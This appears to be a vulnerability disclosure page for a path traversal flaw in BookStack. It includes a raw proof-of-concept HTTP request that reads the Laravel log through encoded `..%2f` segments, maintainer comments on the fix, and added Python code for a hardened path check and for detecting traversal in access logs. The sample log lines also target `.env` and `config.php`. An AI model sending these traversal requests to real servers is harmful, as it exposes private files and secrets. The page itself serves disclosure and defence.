Path Traversal in bookstackapp/bookstack

Valid

Reported on

Oct 30th 2021


Description

While reading the recent BookStack source code (85dc8d) I discovered a path traversal vulnerability. An authenticated user can access all files stored in the storage directory.

Proof of Concept

GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: XSRF-TOKEN=eyJpdiI6IkY0TGptRjlIa29xXC9iSFZqaE91bzVnPT0iLCJ2YWx1ZSI6Im9nZVZSblYxQmt1QXE5Tk9wS0NHVnhraGUySWlrNjhEZGVyeWhoN0ZOdjcxc2ZzTUFIYlozTHVJVzFMZ3VMMjdROUhCUTFjY2s4MVl0MUIxNGU0eWlnT1ErQlpUNHBGQTBJOHErcjR3MW1USVlkbGxCN21INm5pSDZVbk1pQkVBIiwibWFjIjoiNjZkNTUzM2YzMDE2ZjQwZTBiZTM5MTQ5NDY4NjQ4NmE1YzlkOTBhMDIyZjIyNTI2YjYxNjdiMWVhY2ZiMThiZCJ9; bookstack_session=eyJpdiI6Ik1iSDluUVVNU2JMblh0YmJmSjhNSEE9PSIsInZhbHVlIjoiS04wWk5DaEthMVVxUVFuMlwvNGdqVHpHRE95bFk1VjNJTzRvZTZQeVV1blZ3SUhFQ21ySTF1eFRWUWFtZlBiTEdTVzlCWlFxOGdUVEl4RmN1aDhIcUNzXC9tamFKQk1hVStuS2o3RUlUczJQRlo2OGp6NGs2OHU3Q1FGMjZJVlpLUSIsIm1hYyI6ImM3NmY2YWQ0MjdlYTU5OGEyMmQxNWI1NDMyMTQwMzE3NWMzODhiNmFiZDJhN2VmODA1YzExOTVjMWY1MTZmNTIifQ%3D%3D
Upgrade-Insecure-Requests: 1


Impact

Read log files whose paths are predictable.
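To make the defect concrete, here is an added example in Python (not BookStack's code, which is PHP/Laravel; the storage layout, route prefix and helper names are hypothetical and chosen to mirror the report). It shows why the decoded request target `..%2f/..%2f/logs/laravel.log` lands on the log file when the route parameter is simply joined onto the image directory, and the containment check that closes the hole: canonicalise the joined path first, then require it to still sit beneath the canonical image root. The same check also rejects an absolute path smuggled in as `%2f...` and the `%2e%2e` spelling of `..`, while leaving a file name such as `..cover.png` alone. The encoded slash matters because a literal `../` is normally collapsed by the web server before the application sees it, whereas `%2f` is passed through still encoded and only decoded by the framework.

```python
"""Added example (not BookStack's code): why the PoC path escapes the image root,
and a containment check that stops it. Storage layout and helper names here are
hypothetical, chosen to mirror the report."""
from pathlib import Path
from urllib.parse import unquote
import tempfile

IMAGE_ROUTE = "/uploads/images/"


def make_storage() -> Path:
    """Build a throwaway storage tree: <root>/uploads/images (served) and
    <root>/logs/laravel.log (must never be served). All contents are constructed."""
    root = Path(tempfile.mkdtemp()).resolve()
    (root / "uploads" / "images").mkdir(parents=True)
    (root / "uploads" / "images" / "cover.png").write_bytes(b"\x89PNG constructed")
    (root / "logs").mkdir()
    (root / "logs" / "laravel.log").write_text(
        "[2021-10-30 10:00:00] local.ERROR: constructed log line\n"
    )
    return root


def vulnerable_resolve(root: Path, request_path: str) -> Path:
    """Flawed pattern: strip the route prefix, percent-decode, join onto the
    image directory, and never check that the result is still inside it."""
    rel = unquote(request_path[len(IMAGE_ROUTE):])
    return root / "uploads" / "images" / rel


def safe_resolve(root: Path, request_path: str) -> Path:
    """Hardened pattern: canonicalise the joined path (collapses '..' and follows
    symlinks) and then require it to lie under the canonical image directory."""
    base = (root / "uploads" / "images").resolve()
    rel = unquote(request_path[len(IMAGE_ROUTE):])
    candidate = (base / rel).resolve()  # a leading '/' in rel would replace base
    try:
        candidate.relative_to(base)  # raises ValueError when outside base
    except ValueError:
        raise PermissionError(f"request escapes image root: {request_path}") from None
    return candidate


def is_contained(root: Path, request_path: str) -> bool:
    """Convenience wrapper: True when safe_resolve would serve the request."""
    try:
        safe_resolve(root, request_path)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    storage = make_storage()
    poc = "/uploads/images/..%2f/..%2f/logs/laravel.log"  # target from the report
    print("vulnerable join reads:", vulnerable_resolve(storage, poc).read_text().rstrip())
    print("hardened check allows it:", is_contained(storage, poc))
```

Note that the check runs on the canonical path, not on the raw string: rejecting the substring `..` would miss `%2e%2e`, backslash variants and an absolute path, and would wrongly block legitimate names containing dots. Resolving first and comparing against the resolved base handles all of these, and also catches a symlink inside the image directory that points elsewhere.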

We have contacted a member of the bookstackapp/bookstack team and are waiting to hear back a year ago
Dan Brown
a year ago

Maintainer


Thank you so much again @theworstcomrade. Have verified on my own instance. Looks like there is some level of webserver protection that prevents this going too far up, which is something but still far from ideal.

I'm especially annoyed at myself for having this vulnerability. Think I need to do a review through all image and attachment systems as many of these were written before I'd been exposed to, and learnt from, a wide range of attack vectors.

Will mark this as valid and work into a patch to be deployed with the other fix.

Since you won't be paid due to the depleted bucket, is there a way I can send you £40 myself? I really appreciate your efforts of discovering and reporting this.

Dan Brown validated this vulnerability a year ago
theworstcomrade has been awarded the disclosure bounty
The fix bounty is now up for grabs
Dan Brown marked this as fixed with commit 43830a a year ago
Dan Brown has been awarded the fix bounty
This vulnerability will not receive a CVE
ImageController.php#L38 has been validated
theworstcomrade
a year ago

Researcher


@ssdmanbrown This patch looks good, I am no longer able to repeat the vulnerability. Thank you also for the bounty.

Jamie Slome
a year ago

Admin


CVE published! 🎊
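For operators who cannot patch immediately, or who want to know whether the PoC above was ever tried against their instance, here is an added detection example in Python (not part of this report or of BookStack). It parses combined-format access log lines, percent-decodes each request target until stable, and flags any target whose decoded path contains a `..` segment. It goes beyond the exact PoC: it also catches the `%2e%2e` spelling, double encoding such as `%252e`, and backslash variants, while ignoring `..` that merely appears inside a file name. The log lines are constructed samples; the second one mirrors the request in the report.

```python
"""Added example (not BookStack's code): a detection pass over web-server access
logs that flags request targets containing a traversal segment after percent-
decoding. The log lines below are constructed to resemble combined log format."""
import re
from urllib.parse import unquote

# Combined-log-format prefix: client, ident, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, so %252e%252e
    (double-encoded '..') is caught as well as the single-encoded ..%2f
    used in the report. max_rounds bounds the work on hostile input."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_traversal_segment(target: str) -> bool:
    """True when any path segment of the decoded target is exactly '..'.
    Backslashes are folded to '/' so ..%5c variants are treated the same.
    A '..' inside a file name (e.g. '..cover.png') is not a traversal."""
    path = target.split("?", 1)[0]  # only the path, not the query string
    decoded = fully_decode(path).replace("\\", "/")
    return any(segment == ".." for segment in decoded.split("/"))


def find_traversal_attempts(lines):
    """Return (client, target, status) for every parseable line whose
    request target carries a traversal segment."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if match and has_traversal_segment(match["target"]):
            hits.append((match["client"], match["target"], match["status"]))
    return hits


# Constructed sample log lines; the second mirrors the PoC request in the report.
SAMPLE_LOG = [
    '172.17.0.1 - - [30/Oct/2021:10:00:00 +0000] "GET /uploads/images/gallery/cover.png HTTP/1.1" 200 5120',
    '172.17.0.1 - - [30/Oct/2021:10:00:01 +0000] "GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1" 200 8192',
    '10.0.0.5 - - [30/Oct/2021:10:00:02 +0000] "GET /uploads/images/%2e%2e%2f%2e%2e%2f.env HTTP/1.1" 404 162',
    '10.0.0.5 - - [30/Oct/2021:10:00:03 +0000] "GET /uploads/images/%252e%252e%252fconfig.php HTTP/1.1" 404 162',
    '10.0.0.6 - - [30/Oct/2021:10:00:04 +0000] "GET /uploads/images/..cover.png?x=..%2f HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for client, target, status in find_traversal_attempts(SAMPLE_LOG):
        print(f"{client} {status} {target}")
```

A 200 status on a flagged line is the one that matters: it means the file was actually returned, as in the PoC, whereas 404s show only that the pattern was attempted. Because the web server logs the target as received, before the application decodes it, the decoding step in the detector is essential; a search for a literal `../` in the log would miss exactly the encoded form this report relies on.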
